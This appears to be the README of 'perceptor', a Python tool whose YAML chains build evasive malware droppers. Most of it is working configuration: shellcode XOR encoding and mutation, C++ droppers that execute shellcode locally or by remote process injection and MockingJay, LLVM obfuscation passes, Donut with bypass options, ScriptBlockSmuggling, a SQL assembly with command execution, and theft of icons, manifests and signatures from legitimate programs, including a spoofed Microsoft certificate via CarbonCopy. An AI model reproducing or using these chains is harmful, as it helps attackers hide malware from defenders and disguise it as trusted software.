A python script to automatically apply several transforms to source artifact.
- Simple example
- Links
- Constructors
- Credits
We want to xor our shellcode, compile it with string encryption pass from plugin and sign. Given that, we have the next yaml definition:
chain: !Chain
- !modifier.XOREncode
name: Xor encode
key_length: 30
- !codewriter.cpp
name: Generate dropper
functions: dynamic
output_type: exe
payload_placement: data
- *xor
- !cpp.alloc
name: Alloc memory and copy shellcode
method: basic
protection: rx
- !cpp.clean
name: Clean raw memory
variable: raw
- !cpp.drop
name: Execute shellcode
- !compiler.LLVMPass
name: Compile
passes: "strenc"
- !signer.CarbonCopy
name: CarbonCopy
url_description: http://www.microsoft.com
description: "My application"
timestamp_url: http://sha256timestamp.ws.symantec.com/sha256/timestamp
host: www.microsoft.com
port: 443
perceptor -c example.yaml -i src.bin -o out.exe
Random key length (10 - 50)
- !modifier.XOREncode
name: "XOREncode"
Fixed key length
- !modifier.XOREncode
name: Xor encode
key_length: 50
- !modifier.RNDOpcodes
name: Prepend opcodes
n: 300-500
where: start
- !modifier.RNDOpcodes
name: Push opcodes back
n: 300-500
where: end
- !modifier.StringReplace
name: Replace comments
regex: "#(.|\n)*?#>"
replacement: ""
Steal manifest and version_info
- !modifier.ResourceStealer
name: Steal version_info
target: "Blend.exe"
- version_info
- manifest
- !modifier.ResourceCarver
name: Embed version_info into a binary
version: !obj [*metadata, "version"]
version_directory_config: !obj [*metadata, "version_directory_config"]
- !modifier.Manifestor
input: *src_manifest
name: Keep only assemblyIdentity/description with amd64 arch
- description
- assemblyIdentity
processorArchitecture: amd64
Outputs several obj fields:
"version": str,
"processorArchitecture": str,
"name": str,
"type": str,
"description": str,
- !modifier.CreateThreadStub
name: Prepend create thread stub
where: start|end
- !modifier.StudioRandomizer
input: *stdin
name: Randomize guids in studio files
target_project: MyProject
- guid
- assemblyInfo
Or get assemblyInfo from DB
- !modifier.StudioRandomizer
input: *stdin
name: Randomize guids in studio files
target_project: MyProject
- guid
- assemblyInfo
filename: !obj [*metadata, "assemblyInfo.OriginalFilename"]
assemblyAttributes: !obj [*metadata, "assemblyAttributes"]
- !modifier.MvidInjector
input: *stdin
name: Inject Mvid into binary
mvid: !obj [*metadata, "mvid"]
- !modifier.PSCommentRemoval
name: Remove comments from ps script
- !modifier.ShellcodeMutator
name: "Mutate shellcode"
number_of_passes: 2
junk_chance: 30
block_chance: 30
mutate_chance: 30
- !codewriter.cpp
name: Generate dropper
functions: dynamic
output_type: exe
payload_placement: data
- *xor
- *rndb
- *rndf
- !cpp.alloc
name: Alloc memory and copy shellcode
method: basic
protection: rx
- !cpp.clean
name: Clean raw memory
variable: raw
- !cpp.drop
name: Execute shellcode
- !codewriter.cpp
name: Generate dropper
functions: dynamic
output_type: exe
payload_placement: data
- *xor
- *rndb
- *rndf
- !cpp.get_proc_handle
name: Get remote process handle
target: *process
- !cpp.alloc_remote
name: Alloc memory and copy shellcode
method: sections
protection: rx
- !cpp.clean
name: Clean raw memory
variable: raw
- !cpp.exec_remote
name: Execute shellcode
- !codewriter.cpp
name: Generate MockingJay dropper
functions: dynamic
output_type: exe
payload_placement: data
- *xor
- *rndb
- *rndf
- !cpp.delay
name: Delay execution
seconds: 5
- !cpp.mockingjay
name: Generate mockingjay stub
library: mscorlib.ni.dll
- !cpp.drop
name: Execute shellcode
- !codewriter.ScriptBlockSmuggling
name: Wrap script with ScriptBlockSmuggling technique
- !codewriter.SQLAssembly
name: Generate SQL Assembly
- !csharp.sql_asm_info
name: info procedure
- !csharp.sql_asm_cmd_exec
name: cmd_exec procedure
shell: False
- !extractor.PExtractor
name: Extract icons from PE
entity: icon
target: pe.exe
- !extractor.PExtractor
name: Extract manifest from PE
entity: manifest
target: *target
Outputs several obj fields:
"version": str,
"processorArchitecture": str,
"name": str,
"type": str,
"description": str,
- !extractor.PExtractor
name: Extract version from PE
entity: version
target: *target
Outputs several obj fields:
"directory_config": {
"code_page": int,
"version_node": {
"major_version": int,
"minor_version": int
"id_node": {
"major_version": int,
"minor_version": int
- !extractor.PExtractor
name: Extract exports from PE
entity: exports
target: *target
- !converter.Donut
name: Donut transform
donut_args: !flatten
- "--arch 2"
- "--method VoidFunc"
- "--entropy 3"
- "--bypass 3"
- "--compress 2"
Optional arguments:
- icon
- manifest
- version_info
- linker_args
- !compiler.LLVMPass
name: Compile
passes: "function(bcf),function(split),function(lower-switch),function(icall),funwra,ipobf,indibr,strenc"
icon: "icon.ico"
manifest: "manifest.x64.xml"
version_info: "version.rc"
- "-municode"
- "-lnetapi32"
Using an icon from the named link (e.g. PExtractor)
- !compiler.LLVMPass
name: Compile
passes: "function(bcf),function(split),function(lower-switch),function(icall),funwra,ipobf,indibr,strenc"
icon: *icon
manifest: "manifest.x64.xml"
version_info: "version.rc"
- "-municode"
- "-lnetapi32"
- !signer.CarbonCopy
name: CarbonCopy
url_description: http://www.microsoft.com
description: !obj [*manifest, "description"]
timestamp_url: http://sha256timestamp.ws.symantec.com/sha256/timestamp
host: www.microsoft.com
port: 443
- !signer.SigThief
name: SigThief
action: store|write
target: file.exe
- !hiver.MetadataDB
name: Store exe metadata to the db
db: MetadataDB.db
action: store
icon: *icon
version: *version
manifest: *manifest
signature: *signature
- !hiver.MetadataDB
db: MetadataDB.db
action: get
pe_type: net|etc
Exports obj:
"hash": str,
"icon": bytes,
"version": bytes,
"version_directory_config": dict,
"manifest": bytes,
"manifest_directory_config": dict,
"signature": bytes,
"assemblyInfo": dict,
"mvid": str
Extract data from obj attribute from a link
Flatten an array
Get an argument from cmdline